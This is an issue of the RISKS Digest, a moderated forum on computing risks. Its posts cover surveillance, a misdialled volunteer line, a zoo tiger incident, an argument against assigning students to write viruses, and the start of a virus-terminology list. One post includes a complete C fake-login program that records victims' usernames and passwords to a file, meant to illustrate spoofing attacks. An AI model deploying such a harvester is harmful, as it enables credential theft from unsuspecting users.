The RISKS Digest

Forum on Risks to the Public in Computers and Related Systems

ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator

Volume 7 Issue 4

Monday 6 June 1988

Contents

o Review article on privacy/civil liberties risks in CACM
Jon Jacky
o RISKS of wrong numbers and tigers
Steve Nuchia
o Academic Assignment of Viruses
Bill Murray
o Peter J. Denning on Terminology
Bill Kinnersley
o COMPASS '88 PROGRAM
Frank Houston
o Halon agreement and the ozone models
Rob Horn
o Info on RISKS (comp.risks)

Review article on privacy/civil liberties risks in CACM

Jon Jacky <jon@june.cs.washington.edu>
Sun, 05 Jun 88 17:32:33 PDT
Many readers of this digest will be interested in the article, "Information
technology and dataveillance," Roger A. Clarke, Communications of the ACM,
31(5): 498-512, May 1988.  This is a long review with 78 references.

The author defines "dataveillance" as the systematic use of computing
technology in the investigation or monitoring of the actions or
communications of one or more persons.  He distinguishes between "personal
surveillance" - surveillance of an identified person, where there is a
specific reason for the investigation - and "mass surveillance" -
surveillance of large groups of people in order to identify individuals who
might be of interest to investigators.  He concludes that computing
technology is making both kinds much easier to perform, that a great deal
of it is going on, and that more can be expected.

The author does not argue that surveillance is intrinsically evil or that
it should be ruled out altogether, but he does argue that much of what is
now going on - especially the mass surveillance - is a bad thing.  He
concludes that the privacy and civil-liberties protections in place in most
countries are inadequate against these new surveillance techniques.  Because
of their special knowledge, he says, people working in computing have a
special responsibility to consider the privacy implications of their work,
to evaluate safeguards, and to lobby for effective ones.

- Jon Jacky, University of Washington


RISKS of wrong numbers and tigers

Steve Nuchia <nuchat!steve@uunet.UU.NET>
4 Jun 88 18:32:45 GMT
(Paraphrased from The Houston Post, 29 April)

A local newscast carried a story on a Herpes research project under way at
Baylor College of Medicine, and displayed a phone number for volunteers to call
- with appropriate assurances of confidentiality.

Not only was it the wrong number, it was the number for the "back door" to
the public address system at Baylor.  (There was no indication of how large
an area was covered - it is a big place.)

The callers, hearing a pickup but no answer, "assumed it was an answering
machine" and "gave their names, phone numbers, everything."

I believe this points up an important "human factor."  People are a lot less
cautious when they initiate a contact than when they are contacted.  This
explains the easy success of the typical "service spoof" attacks - password
harvesters and "night deposit box out of order" scams.  I don't have a magic
answer for designers of services - it is very hard to design a service that is
at all hard to spoof if the clients aren't at least a little bit cautious.
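
To make the "service spoof" concrete, here is a minimal sketch of the
classic fake-login harvester.  (The language, file name, and messages are
purely illustrative assumptions, not drawn from any particular incident.)
A program left running on a public terminal imitates the login banner,
quietly records whatever is typed, and then reports a failure so that the
victim simply retries and suspects nothing:

    #include <stdio.h>

    int main(void)
    {
        char user[64], pass[64];
        FILE *log;

        printf("login: ");               /* imitate the real banner */
        if (fgets(user, sizeof user, stdin) == NULL)
            return 1;
        printf("Password: ");            /* a real login would suppress echo */
        if (fgets(pass, sizeof pass, stdin) == NULL)
            return 1;

        log = fopen("harvest.txt", "a"); /* hypothetical harvest file */
        if (log != NULL) {
            fprintf(log, "%s%s", user, pass);  /* fgets keeps the newlines */
            fclose(log);
        }

        printf("Login incorrect\n");     /* victim assumes a typo and retries */
        return 0;
    }

The defense is exactly the caution described above: treat any prompt you
did not deliberately invoke with suspicion.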


Second item:

One of the tigers at the Houston Zoo went through a window in a door and
killed an employee.  It happened at night, and the public would not have
been in immediate danger even in the daytime, but the incident nevertheless
caused quite a ruckus.

The firm that designed the enclosure stated that the door design, including the
window pane used, was "standard" for that kind of application.  The tiger had
no trouble going through it, and there was no indication that it was defective,
nor that any other tiger would have had any trouble going through any other
door of like design.

(Zoo officials have the big cats in holding cages while the window materials
used in the (relatively new) cat facility are tested - by swinging miniature
wrecking balls into them.  The cat facility is a modern close-contact one - you
can routinely find one of the lionesses sleeping against a window with the
public on the other side - in a tunnel.)

Apparently quite a few nominally professional people in the world think that
standards excuse them from thinking.  Perhaps that explains the popularity of
standards?

Applicability to computers?  Gee, there aren't any people clamoring for
standards in the computer industry, are there?

Steve Nuchia  uunet!nuchat!steve  (713) 334 6720

  [Yes, but we've always had tiger teams trying to break system security.  PGN]


Academic Assignment of Viruses

<WHMurray@DOCKMASTER.ARPA>
Sun, 5 Jun 88 10:25 EDT
A society that depends upon any mechanism for its own proper functioning
cannot tolerate, much less encourage, any tampering with the intended
operation of that mechanism.

Therefore, one is tempted to rise up in indignation at the idea of a qualified
academic assigning a virus to his students.  The next thing you know, they will
be assigning plagiarism.  How about the forgery of academic credentials?
Perhaps we should offer a course in how to falsify research results.  Or,
perhaps, on how to trash another's experiments, notes or reports.

Perhaps it is a sign of immaturity that we are unable to recognize the moral
equivalency.  I will leave open the question of whether the immaturity is in
the technology, the society, or academia.

I thought that we put this issue to bed several years ago when we stopped
assigning the breaking of security.  It seems that we did not.

For an academic to be unable to recognize that assignments, and the
recognition that goes with their successful completion, encourage the
behavior assigned demonstrates a lack of understanding of the activity in
which he is engaged.  If he understands it and still makes such an
assignment, he demonstrates a lack of understanding of where his real
interest rests.

Such irresponsible behavior may account, in part, for the anti-academic bias in
our society and for the manifest distrust of the scientific establishment.  It
is of little wonder that the citizens of Cambridge, Massachusetts are reluctant
to trust the likes of these with genetic engineering.

If there is any lesson that we should have learned from the computer, it is
that understanding the effects of what we intend for it to do is a daunting
task.  Even getting it to do what we intend is not trivial.  It seems to me
that there is plenty of material here for assignments; we need not look to
assignments that are at best trivial and at worst dangerous.

William Hugh Murray, Fellow, Information System Security, Ernst & Whinney
2000 National City Center Cleveland, Ohio 44114                          
21 Locust Avenue, Suite 2D, New Canaan, Connecticut 06840                


Peter J. Denning on Terminology

Bill Kinnersley <iphwk%MTSUNIX1.BITNET@CUNYVM.CUNY.EDU>
Mon, 6 Jun 88 12:02:13 mdt
        Subscribers to this list may be interested in the recent article
"Computer Viruses" by Peter J. Denning in American Scientist, vol. 76,
p. 236.  In particular, he discusses terminology.  Paraphrasing his
definitions:

1) Worm - a program that invades a workstation and disables it.